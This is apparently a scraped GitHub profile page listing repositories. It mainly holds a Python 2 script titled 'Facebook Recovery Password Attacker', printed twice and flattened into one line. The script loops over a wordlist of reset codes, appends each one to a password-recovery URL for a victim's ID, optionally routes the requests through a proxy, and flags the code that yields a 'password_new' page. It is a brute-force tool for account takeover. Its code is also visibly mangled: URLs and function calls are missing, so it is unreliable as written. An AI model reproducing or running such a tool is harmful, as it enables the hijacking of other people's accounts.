Pinned Repositories
Config files for my GitHub profile.
import urllib2 ,sys ,re import os import ssl import time def cls(): linux = 'clear' windows = 'cls' os.system([linux,windows][ == 'nt']) cls() os.system(['','color D'][ == 'nt']) print ''' SELAMAT DATANG DI ACEH CYBER TEAM CODE: BY R15ky Ch4nn3L FACEBOOK RECOVERY PASSWORD ATTACKER _____ _ _ | ___|_ _ ___ ___| |__ ___ ___ | | __ | |_ / _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ / | _| (_| | (_| __/ |_) | (_) | (_) | < |_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\ ''' if len(sys.argv) != 3: print "\n\n[#] Penulisan: python2 [TagetID] [listkode.txt] " sys.exit() target = sys.argv[1] wordlist = sys.argv[2] while True: print """ ============ Menu ============== 1- Reset Password Korban Dengan Proxy 2- Dengan Proxy saja """ choice=raw_input("Masuka Pilihan Mu: ") if choice=="1": try: word = open(wordlist, 'r').readlines() print "[+] Kode Nya Tersimpan \!/\n[+] Codes:",len(word) except("IOError"): print "[-] Hanya dalam Format .txt Ngentod :v" sys.exit(1); for w in word: w = w.rstrip() try: target = ''+target+'&n='+w get = urllib2.urlopen(target).read() except IOError: print " Gabisa Dimuat Halaman Nya :( " search ='password_new', get) if search: print "[+] Kode Yang Ini "+w+" Bener anda beuntung^___^ " else: print "[+] Kode Yangini "+w+" Salah nyan >:( " else: print """ Selamat Datang Di Tools Saya Masukan Proxy:Port Anda Beb:* Penggunaan : [ip:port] """ ip_proxy=raw_input("Masukan Proxy Mu : ") print "[##] Proxy Terpasang : "+ip_proxy proxy = urllib2.ProxyHandler({'http': ip_proxy}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) #ip = urllib2.urlopen('').read() #theIP = re.findall(r"\d{1,3}\.\d{1,3}\.\d{1,3}.\d{1,3}", ip) #print theIP #datum = #response.close() #print datum try: word = open(wordlist, 'r').readlines() print "[+] Kode Reset Tersimpan \!/\n[+] Kodd:",len(word) except("IOError"): print "[-] Yang Ini Gabisa Di Pake Anjirr !!" sys.exit(1); for w in word: w = w.rstrip() try: target = ''+target+'&n='+w get = urllib2.urlopen(target).read() except IOError: print " Yahh halaman ny gabisa dimuat :( " search ='password_new', get) if search: print "[+] Kodenya yang ini "+w+" Bener Sayang :* " else: print "[+] Kode Yang Ini "+w+" Gabisa Dipakai Tod :v "
An online platform for handling all the NADRA works
Fsdhacker's Repositories
Config files for my GitHub profile.
An online platform for handling all the NADRA works
import urllib2 ,sys ,re import os import ssl import time def cls(): linux = 'clear' windows = 'cls' os.system([linux,windows][ == 'nt']) cls() os.system(['','color D'][ == 'nt']) print ''' SELAMAT DATANG DI ACEH CYBER TEAM CODE: BY R15ky Ch4nn3L FACEBOOK RECOVERY PASSWORD ATTACKER _____ _ _ | ___|_ _ ___ ___| |__ ___ ___ | | __ | |_ / _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ / | _| (_| | (_| __/ |_) | (_) | (_) | < |_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\ ''' if len(sys.argv) != 3: print "\n\n[#] Penulisan: python2 [TagetID] [listkode.txt] " sys.exit() target = sys.argv[1] wordlist = sys.argv[2] while True: print """ ============ Menu ============== 1- Reset Password Korban Dengan Proxy 2- Dengan Proxy saja """ choice=raw_input("Masuka Pilihan Mu: ") if choice=="1": try: word = open(wordlist, 'r').readlines() print "[+] Kode Nya Tersimpan \!/\n[+] Codes:",len(word) except("IOError"): print "[-] Hanya dalam Format .txt Ngentod :v" sys.exit(1); for w in word: w = w.rstrip() try: target = ''+target+'&n='+w get = urllib2.urlopen(target).read() except IOError: print " Gabisa Dimuat Halaman Nya :( " search ='password_new', get) if search: print "[+] Kode Yang Ini "+w+" Bener anda beuntung^___^ " else: print "[+] Kode Yangini "+w+" Salah nyan >:( " else: print """ Selamat Datang Di Tools Saya Masukan Proxy:Port Anda Beb:* Penggunaan : [ip:port] """ ip_proxy=raw_input("Masukan Proxy Mu : ") print "[##] Proxy Terpasang : "+ip_proxy proxy = urllib2.ProxyHandler({'http': ip_proxy}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) #ip = urllib2.urlopen('').read() #theIP = re.findall(r"\d{1,3}\.\d{1,3}\.\d{1,3}.\d{1,3}", ip) #print theIP #datum = #response.close() #print datum try: word = open(wordlist, 'r').readlines() print "[+] Kode Reset Tersimpan \!/\n[+] Kodd:",len(word) except("IOError"): print "[-] Yang Ini Gabisa Di Pake Anjirr !!" sys.exit(1); for w in word: w = w.rstrip() try: target = ''+target+'&n='+w get = urllib2.urlopen(target).read() except IOError: print " Yahh halaman ny gabisa dimuat :( " search ='password_new', get) if search: print "[+] Kodenya yang ini "+w+" Bener Sayang :* " else: print "[+] Kode Yang Ini "+w+" Gabisa Dipakai Tod :v "